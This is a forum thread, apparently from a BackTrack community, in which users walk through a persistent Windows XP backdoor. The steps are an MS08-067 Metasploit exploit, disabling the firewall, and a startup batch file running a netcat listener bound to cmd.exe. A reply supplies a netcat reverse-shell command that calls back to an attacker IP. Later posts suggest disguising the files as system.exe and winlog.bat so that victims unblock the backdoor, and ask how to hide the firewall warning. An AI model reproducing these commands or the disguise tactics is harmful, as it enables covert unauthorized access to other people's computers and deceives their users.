You can open a port for nc instead of disabling the firewall.
My first backdoor in Windows xp sp2 home edition
I manage to do my first backdoor.
Lab: Attacker: dell laptop inspirion 1525 usb Backtrack4 prefinal
Victim: virtual box Windows xp sp2 home edition under linux ubuntu 9.04 .
I think these steps are easy so anyone who start working wit Bt as i start few months ago can try this to see in general how persistent backdoor works.
First i run metasploit and exploit smb/ms08_067_netapi with payload windows/meterpreter/reverse_tcp.
After i get active session first i disable firewall with Carlos Perez script.
Then i uplod file nc.exe in C:/ (or any directory you want) and batch file with name test.bat which i previously made in notepad runed in wine which i upload in startup folder of victim machine.
Test.bat had this in file: start C:\nc.exe -L -p 5555 -d -e cmd.exe.
After i do this and reboot machine my backdoor always listen on port 5555 (or you can put someother port) and everytime machine start you can see i one second black cmd screen which start listener on port 5555.
Then just type on Attack machine: nc (ip of target) 5555 and you will get reverse shell.
Its far from ideal backdoor and has many drawbacks but i think its nice way to start to see how backdoors work in general.
If someone has any sugesstions (i didnt manage to bypass firewall without disable it with ruby script first) or something like that or someone how will try this can ask me here and i will help him to make same thing as me?
You can open a port for nc instead of disabling the firewall.
If you can't explain it simply, you don't understand it well enough -- Albert Einstein
Just to correct you (congratulations on your first one by the way), but that is not a reverse shell.
If the test.bat ran:That would make it a reverse shell. As it is you have yourself a bind shell.Code:nc -nw 10 -d 192.168.1.2 5555 -e cmd.exe
Incidentally infinitely easier to work with reverse shells as you don't get the "Windows is Unprotected" rubbish from the Security Center (unless, of course, you disable the security center, which may or may not be noticed by the user).
Still not underestimating the power...
There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.
Yes sorry i mean bind shell i was fast when i write post.
Yes ofcourse drawback is that it may be noticed by user i have many new ideas with better things i just made this to see how it works and for some other not so expirienced users to start with that because it is easy and nice way to start work with backdoors.
I think that this backdoor will not work in Vista because as i remember (i must put Vista on VM) start up folder is hidden.
I think in Vista you must do something with registry.
Also we can use some sort of social engineering.
We can for example nc.exe rename it to system.exe all to some file similar to some files from windows system.
Also we can bat file call it not test but winlog.bat for example.
How this can help us: For example we do backdoor like i do my backdoor and on victim machine pop up message that firewall is turned off after next reboot.
Ofcourse victim turn it on again.Then reboot computer or turn it off. Next time when he boot his windows on the start it will say that windows firewall block program (nc.exe which we put in start up menu) but it will not say that it blocks nc.exe it will say that it block for example system.exe and i think any ordinary user will put unblock because he will think that it is something connecting with system and he will unblock it. And we have our bind shell in peace.
What you think about that Gitsnik?
Also can we somehow edit in reg with meterpreter that this icon when firewall is off dosent pop out?
Familiarise yourself with the command line "firewall" commands (no further hints than that). If you're installing your back door, you can just open up the port - assuming the windows firewall is the only one in use.
Still not underestimating the power...
There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.
I told you...Originally Posted by Gitsnik
If you can't explain it simply, you don't understand it well enough -- Albert Einstein
No what you did is provide a new guy a far-too-broad interpretation of what to do. Most people don't even know they can control the networking services from the command line.
I am all for not baby sitting, but even I have to concede some information is hard won.
Still not underestimating the power...
There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.
, i was one of themMost people don't even know they can control the networking services from the command line.. But after i read Ed Skoudis Command Line Kung Fu every thing become clear for me .
blog = Command Line Kung Fu
also there is Pdf version .
How you spend your time is more important than how you spend your money. Money mistakes can be corrected, but time is gone forever. David Norris
Sorry but... how do you get an active session with windows firewall on?
I try exactly the same scenario in a Victim: virtual box Windows xp sp2 Pro edition under Vista Home Premium and I cannot get an active session unless I disable the windows XP firewall.
Is something that I am missing?
Is there any case that the firewall in XP Professional edition has different behavior from Home edition ?
Thnx
Posting Permissions